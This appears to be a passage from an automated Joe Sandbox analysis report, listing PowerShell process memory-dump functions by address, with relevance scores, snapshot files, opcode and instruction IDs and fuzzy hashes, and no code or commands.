                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J2k
                                                                      • API String ID: 0-1631774145
                                                                      • Opcode ID: 0ecece8ec8677fcdbcb4316494b351b79ae5c0a4cecfd6a02e60e0e0d4213954
                                                                      • Instruction ID: 38a57fbcb450f85f57ee2e18fab7ea6c2c78f386a4f973e503aad343df95ebdd
                                                                      • Opcode Fuzzy Hash: 0ecece8ec8677fcdbcb4316494b351b79ae5c0a4cecfd6a02e60e0e0d4213954
                                                                      • Instruction Fuzzy Hash: 4141B030A042459FCB15DFB8D864AADBBF2FF4A300F1485A9E456AB362DB306D45CB91
                                                                      Function 02D9E610 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J2k
                                                                      • API String ID: 0-1631774145
                                                                      • Opcode ID: a45359befa7e029d33509fa54ce53e78d81e7b689766f248830c824c2c960717
                                                                      • Instruction ID: ec6bdcef5de36afe5c67adf9c5c021d594ffec01520ba96de40a89828181432d
                                                                      • Opcode Fuzzy Hash: a45359befa7e029d33509fa54ce53e78d81e7b689766f248830c824c2c960717
                                                                      • Instruction Fuzzy Hash: 6E41D531A042458FCB11DF78D864AADBFF1FF4A304F1885A9E456AB362DB306D45CB91
                                                                      Function 02D9E640 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J2k
                                                                      • API String ID: 0-1631774145
                                                                      • Opcode ID: 0615f047eeec194bbcb80a0d13383ab32fb35bde30bbe4cc751c150beffd1d8e
                                                                      • Instruction ID: f74c897dc387543053a76360c12a93d844ad81abb5f8ab1480c707b0d912db69
                                                                      • Opcode Fuzzy Hash: 0615f047eeec194bbcb80a0d13383ab32fb35bde30bbe4cc751c150beffd1d8e
                                                                      • Instruction Fuzzy Hash: 8D317C30A002058FDB14DF69E994B9EBBF2FF88704F148529E416A7391DB31AD45CF91
                                                                      Function 02D9DC88 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +/Ip^
                                                                      • API String ID: 0-3713844593
                                                                      • Opcode ID: ffbbc22a17c2ac13d07ff87186e3199eca9bc9cd630909cb6b604bff9cc1cba8
                                                                      • Instruction ID: e5f598f162e2e0245e29e4ef6d914ff1eb18cb95b5d7a3c88977d7aeb5b54dfa
                                                                      • Opcode Fuzzy Hash: ffbbc22a17c2ac13d07ff87186e3199eca9bc9cd630909cb6b604bff9cc1cba8
                                                                      • Instruction Fuzzy Hash: 03F0B4316082545FCB06A75DA8209EF7BABDECB57130844ABF4898B301EB619D05C7F2
                                                                      Function 02D9DC98 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +/Ip^
                                                                      • API String ID: 0-3713844593
                                                                      • Opcode ID: f0fb05ba3aca4a79dabf7e3b06f68c6cb2054dfe4375fb5d536bc875fd38f1ab
                                                                      • Instruction ID: 5afed4d734c0ac9d2613df443cf52f4ccfbfa256e3da956bc786057e2c4b7f71
                                                                      • Opcode Fuzzy Hash: f0fb05ba3aca4a79dabf7e3b06f68c6cb2054dfe4375fb5d536bc875fd38f1ab
                                                                      • Instruction Fuzzy Hash: 22E08C32700614078A11A61EA900A5F77DBDEC9AB1354842EF05A8B340DFA5DD45CBE6
                                                                      Function 02D9E7B8 Relevance: .3, Instructions: 254COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f127cda7c8888d2a0673b6ba623e4c61da83ff8a9d9c36ea3770ceac08d5d382
                                                                      • Instruction ID: 46637556c1fb0ef8d5e16f342d815e1fc5b6cfa96e553714c33346db96651dac
                                                                      • Opcode Fuzzy Hash: f127cda7c8888d2a0673b6ba623e4c61da83ff8a9d9c36ea3770ceac08d5d382
                                                                      • Instruction Fuzzy Hash: 33919E74B042248FDF14DF69D550A6DBBF6BF88614B24406AE806EB361DF70DC41CB90
                                                                      Function 02D929F0 Relevance: .2, Instructions: 210COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 66e7a57074bcf55185064473f01f5c0cb701120b7a8fc4cca182a8ff8e89761c
                                                                      • Instruction ID: c1f1720a37162c86e492d8ae8a99286d00dfe3818222298030ec52b953b729ca
                                                                      • Opcode Fuzzy Hash: 66e7a57074bcf55185064473f01f5c0cb701120b7a8fc4cca182a8ff8e89761c
                                                                      • Instruction Fuzzy Hash: 9D91AE70A046059FCB15CF98C498AAEFBF1FF48314B248659E915AB365C736EC91CFA0
                                                                      Function 02D97740 Relevance: .2, Instructions: 156COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80bc952e080d90c40e1378e3a0da200514c36c0750ab4d43a6c1e5f0841db425
                                                                      • Instruction ID: ab0a65b652bd7ed75d911f1aaed5b1f481b343fdd0f1c5e3ae539ef380926113
                                                                      • Opcode Fuzzy Hash: 80bc952e080d90c40e1378e3a0da200514c36c0750ab4d43a6c1e5f0841db425
                                                                      • Instruction Fuzzy Hash: F151CE743142159FEB049B69D844F3AB7EAFFC9614F1585AAE40ACB352EB31DC01CBA0
                                                                      Function 02D9BAC0 Relevance: .2, Instructions: 155COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8702a9b8da6b87b506a0d44c8e6abdedf93c707a51825662dd1c2e5854913dff
                                                                      • Instruction ID: b89522593c97960e41026c22b552d80b2a5445c38c9d14bda1074b3fd7f5b00e
                                                                      • Opcode Fuzzy Hash: 8702a9b8da6b87b506a0d44c8e6abdedf93c707a51825662dd1c2e5854913dff
                                                                      • Instruction Fuzzy Hash: 00610571E002489FDB14DFA9D584B9DBBF1EF88314F25812AE809AB354EB709D81CB60
                                                                      Function 02D9BAB0 Relevance: .2, Instructions: 151COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: afa0c817ea8cbafada5f41abbfc360ff901e4ab87b356daccaed1c0cca76a080
                                                                      • Instruction ID: 598bcd29d6a595820fb7e8771bdfd432e4ad74e944e08292b9e0c1d73f742a58
                                                                      • Opcode Fuzzy Hash: afa0c817ea8cbafada5f41abbfc360ff901e4ab87b356daccaed1c0cca76a080
                                                                      • Instruction Fuzzy Hash: 61512771E002489FDF14CFA9D584B9DBBF1EF88314F15806AE809AB365DB709C45CB60
                                                                      Function 02D9E419 Relevance: .1, Instructions: 140COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5bd9a5aed32376f05c0c8653e8c3972aa0d9b477c162ea0820f35a940a49b85d
                                                                      • Instruction ID: dd9eb9becaea62ff08c476f389e60e7dc976a140cac4a4ffe4aec6b0af89b3e6
                                                                      • Opcode Fuzzy Hash: 5bd9a5aed32376f05c0c8653e8c3972aa0d9b477c162ea0820f35a940a49b85d
                                                                      • Instruction Fuzzy Hash: 79514B74700305CFDB10EF68C594B6ABBE6AF8921075885A9E449CF362EBB4EC41CB51
                                                                      Function 02D9E428 Relevance: .1, Instructions: 130COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: af569040c1c3ccdf8b4ea0382bfbe26c15ecfc2fdccb2a3fee47e088a6bf541b
                                                                      • Instruction ID: 037797034547206f7d94cd25ae0afc9477a85c08ce1f0304d5fdced579a16175
                                                                      • Opcode Fuzzy Hash: af569040c1c3ccdf8b4ea0382bfbe26c15ecfc2fdccb2a3fee47e088a6bf541b
                                                                      • Instruction Fuzzy Hash: BC413874700205CFDB10EF6CC584B6AB7E6EFC92107548569E449DB366EBB4EC41CB91
                                                                      Function 02D96FE0 Relevance: .1, Instructions: 114COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ddcc6e3dbda84506635f6cf70abb8aa7d4b9dae96309973f22bffc9319301f9d
                                                                      • Instruction ID: 28c0fb7b1833955a35a5df5e2ed7c6e2af6af6962f15282a4a6cd4eee9aebb51
                                                                      • Opcode Fuzzy Hash: ddcc6e3dbda84506635f6cf70abb8aa7d4b9dae96309973f22bffc9319301f9d
                                                                      • Instruction Fuzzy Hash: CF415974B14204CFEB14DB64C468BAEBBF2EF8E611F244099E446AB3A1CB75DC01CB61
                                                                      Function 02D92B00 Relevance: .1, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e5c79d2d555ae9ba4712c4e672eec38f0c48fffa818111bdd37f296396bd8f8f
                                                                      • Instruction ID: 5fdb66025fcc06a5fef23676139a33a1fbbcad5f6c710d19b98f66ee2f15269e
                                                                      • Opcode Fuzzy Hash: e5c79d2d555ae9ba4712c4e672eec38f0c48fffa818111bdd37f296396bd8f8f
                                                                      • Instruction Fuzzy Hash: 57411674A00609AFCB19CF99C498EAAF7F1FF48314B158259D915AB364C736EC91CFA0
                                                                      Function 02D96FB0 Relevance: .1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f91411f53ce7881cec8ec701716405677afe5cf5a3278a3f8768086bb3020b6b
                                                                      • Instruction ID: adbd321b28fada860035115808cc850e5a21eef26e950450cdf8f7aaf47573e0
                                                                      • Opcode Fuzzy Hash: f91411f53ce7881cec8ec701716405677afe5cf5a3278a3f8768086bb3020b6b
                                                                      • Instruction Fuzzy Hash: C94150747142458FEB15CF65C498AAEBFF1AF8E214F2850A9E446AB362CB71DC41CB21
                                                                      Function 02D9C388 Relevance: .1, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ed784aefc313753fe179c27fc2b0af686684e80e1e08ae371078f0fed2e769da
                                                                      • Instruction ID: 09cbd6d32abc553d71b1fe2a2950b3f61175fc4b2b7d7aff4a51d4edd953fc34
                                                                      • Opcode Fuzzy Hash: ed784aefc313753fe179c27fc2b0af686684e80e1e08ae371078f0fed2e769da
                                                                      • Instruction Fuzzy Hash: 0D31AD313002009FDB05DB78E844B9EB7A6EFC9611F548639E54ACB391DFB1AC45CBA1
                                                                      Function 07403DD2 Relevance: .1, Instructions: 100COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1746245921.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7400000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1e4be2b600e6507911c8dbc8bab469667389f65974f595309d878bd834687c52
                                                                      • Instruction ID: ae0e5398df7f008761220e266f0658035c8e53271249edf4c4c2f73553a90bea
                                                                      • Opcode Fuzzy Hash: 1e4be2b600e6507911c8dbc8bab469667389f65974f595309d878bd834687c52
                                                                      • Instruction Fuzzy Hash: F8317AB1B04315CBD725AA64D8046AFF7A39BC5658F10857FCA029B381CF359D0287E1
                                                                      Function 02D9AE60 Relevance: .1, Instructions: 91COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 338003e016278aabb8d69c074ac039fcd8e687b2d0dd2ab8ad5da9dffab92374
                                                                      • Instruction ID: 14f7d6710d8c79785f86ee997a772721e78e1bac651cd03b49ba88e1d4389c37
                                                                      • Opcode Fuzzy Hash: 338003e016278aabb8d69c074ac039fcd8e687b2d0dd2ab8ad5da9dffab92374
                                                                      • Instruction Fuzzy Hash: C1314B72A002099FEF04DFA9D5947AEBBF6EF89710F158069F405EB390EB748C418B65
                                                                      Function 02D9AE70 Relevance: .1, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8b01abbd40887b229599f0577ba62813c731700add65ef82a123e3fbe00199da
                                                                      • Instruction ID: 5ba0392317f3a5cbcb5a4319efe7022303b79c17df4b5e8935d9ee308cc439de
                                                                      • Opcode Fuzzy Hash: 8b01abbd40887b229599f0577ba62813c731700add65ef82a123e3fbe00199da
                                                                      • Instruction Fuzzy Hash: 9C311872A006099FDF04DFA9D5947AEBBF6EF89710F158029F405EB390EB748C418BA5
                                                                      Function 02D9AD28 Relevance: .1, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ebd27c4a2911bef2072ff188701ab370892349f3a38f26f89a355cf92140d478
                                                                      • Instruction ID: bac108eac7c0c163b97f44d79d71c58341d7c67dce65d2f18e08efe244f6e0da
                                                                      • Opcode Fuzzy Hash: ebd27c4a2911bef2072ff188701ab370892349f3a38f26f89a355cf92140d478
                                                                      • Instruction Fuzzy Hash: 9231CFB4A042449FDB05DBA4D895FAE7BF2FF85700F1084ADE105AB392CA759D00CF61
                                                                      Function 02D9DFC0 Relevance: .1, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f173dbd34fa8f7f1e4b1e2558ac75a89350d61889aedc6031b376cc34e0952a0
                                                                      • Instruction ID: c52a632824e05d5a86f536993898b7c85a16d4a4fcbd4dab66a51881dee29b86
                                                                      • Opcode Fuzzy Hash: f173dbd34fa8f7f1e4b1e2558ac75a89350d61889aedc6031b376cc34e0952a0
                                                                      • Instruction Fuzzy Hash: AB314F71A002048FCB14DF68D458AAEBBF1FF8D210F14456EE846EB3A2DB719C45CB55
                                                                      Function 02D9AF98 Relevance: .1, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 42f65218339e343a19fdb07f9d1592b48c240243f2c37cad73bf94c895050049
                                                                      • Instruction ID: a88ea0ed0e4854da7bf429883504ac019ab64b3620b92ac903f59df46e1b320b
                                                                      • Opcode Fuzzy Hash: 42f65218339e343a19fdb07f9d1592b48c240243f2c37cad73bf94c895050049
                                                                      • Instruction Fuzzy Hash: 4421D176A043488FCB14DFAAD40079EBBF6EF89220F14846AE418E7340CB75AC45CBA5
                                                                      Function 02D9DFD0 Relevance: .1, Instructions: 77COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1844e81fbddea264142ac20e27da770d8a9d7bb1b740ba5808113f6065dfe629
                                                                      • Instruction ID: 9eabbe739f7dd78ca8bfd474462441f656ef76fdc6d85b81020400005208ce55
                                                                      • Opcode Fuzzy Hash: 1844e81fbddea264142ac20e27da770d8a9d7bb1b740ba5808113f6065dfe629
                                                                      • Instruction Fuzzy Hash: 38310971A002048FCB14DF69D458AAEBBF2FF8C614F14856EE806E73A1DB71AC41CB91
                                                                      Function 02D9AD38 Relevance: .1, Instructions: 77COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a658bf013293d5354104495711703cca8d6e794cd8f3f053bfffb1d535db2b05
                                                                      • Instruction ID: 1fda457304ef04a4b95d642059152cc56601cb7de750fca4baa0b38531d5f6da
                                                                      • Opcode Fuzzy Hash: a658bf013293d5354104495711703cca8d6e794cd8f3f053bfffb1d535db2b05
                                                                      • Instruction Fuzzy Hash: 75314FB4A002089FDB04DFA4D455FAE77F2FF85700F508469E515AB395DE359E418F90
                                                                      Function 07402700 Relevance: .1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1746245921.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7400000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1a2787a0f1b7807dcd9b495a7b57ad0a567b322528c1327528f61ad2851eda6f
                                                                      • Instruction ID: 99a472e6372de250a2c612b3ed8ff9b40d80e67ce8550b0972c1c98eaacde9db
                                                                      • Opcode Fuzzy Hash: 1a2787a0f1b7807dcd9b495a7b57ad0a567b322528c1327528f61ad2851eda6f
                                                                      • Instruction Fuzzy Hash: 24218DB9A10206DFDB208F69C58CBE6B7E1BB45265F14C57BD9088B2D0D3B4D944CBE1
                                                                      Function 02D993F0 Relevance: .1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2322852df740ea62c0b6e6ff52ee4433455ca0c4f392a9affcf3899540df9009
                                                                      • Instruction ID: b77bd5a188fc27abf0d1ba434643ab3b194de04982dd37f4193fd90223377e4a
                                                                      • Opcode Fuzzy Hash: 2322852df740ea62c0b6e6ff52ee4433455ca0c4f392a9affcf3899540df9009
                                                                      • Instruction Fuzzy Hash: 3E3169719057448FDB65CF6AC0883DABBF2EF89320F28805DE8499B316D7746881CB65
                                                                      Function 00BCF3D8 Relevance: .1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739548138.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_bcd000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ae1d9a49f9cc6830a2bbb572f1a8e070d13102e0a39de32836e680f5e773b0cb
                                                                      • Instruction ID: 4e6189584cea879227ca9b43ba78e476ec350d76d557e056915ed980432f52fe
                                                                      • Opcode Fuzzy Hash: ae1d9a49f9cc6830a2bbb572f1a8e070d13102e0a39de32836e680f5e773b0cb
                                                                      • Instruction Fuzzy Hash: 6F21A176504241EFDB09DF50D9C0F26BBA6EB88314F24C5EDE9094A356C336D856CBA1
                                                                      Function 00BCF02C Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739548138.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_bcd000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 731b325b4682fe897ed8389d740baa773d659f4f257abcc5039d20624e3bdc77
                                                                      • Instruction ID: 536225002e7a3d3a461032159dfc05ec726963c0bc0cecf9986cbb64ca587a1f
                                                                      • Opcode Fuzzy Hash: 731b325b4682fe897ed8389d740baa773d659f4f257abcc5039d20624e3bdc77
                                                                      • Instruction Fuzzy Hash: FD212275604241DFDB14DF24C9C0F26BBA2EB84724F24C5FDD80A4B246C33AD846CA62
                                                                      Function 02D99400 Relevance: .1, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9ed6cf06477df533d8f6a4093eef877019cd62bd1e117c235088dded106ce44a
                                                                      • Instruction ID: 5cb1f1390b71733522e3e6d54c670fd69ca6c15124ce148232d986bc450bc5bb
                                                                      • Opcode Fuzzy Hash: 9ed6cf06477df533d8f6a4093eef877019cd62bd1e117c235088dded106ce44a
                                                                      • Instruction Fuzzy Hash: 132148B19057448FDB64DF6AC0883CAFBE2EB89310F28841DE85D97345D7746881CB65
                                                                      Function 02D9767C Relevance: .1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 307ef29d6984d7bb170f65b9be985d69ba8c17650cf60b73d040386a8eca8977
                                                                      • Instruction ID: 3a42b25b2e96e691625bae9a7e1bd62805d17dbd149100652256d041f31c0d7d
                                                                      • Opcode Fuzzy Hash: 307ef29d6984d7bb170f65b9be985d69ba8c17650cf60b73d040386a8eca8977
                                                                      • Instruction Fuzzy Hash: 90113776700128CFDB10DBA8E840ADEB7F6EBC8625B4440A9E509EB711DB30DD018BA0
                                                                      Function 02D9E318 Relevance: .1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0d53e0c01a8216081cb016fd5f362712e25f98397af9437badf9edc22983eeb8
                                                                      • Instruction ID: 85d6d7c95fec6f7c464c88cbecc4ebb835ad05cbf3a9d63c1103ac51927f6856
                                                                      • Opcode Fuzzy Hash: 0d53e0c01a8216081cb016fd5f362712e25f98397af9437badf9edc22983eeb8
                                                                      • Instruction Fuzzy Hash: 5D217F71805345CFDB11DF9AC5047DABFF4EF49314F1884AAD488A7251D338A945CB61
                                                                      Function 074028E8 Relevance: .1, Instructions: 58COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
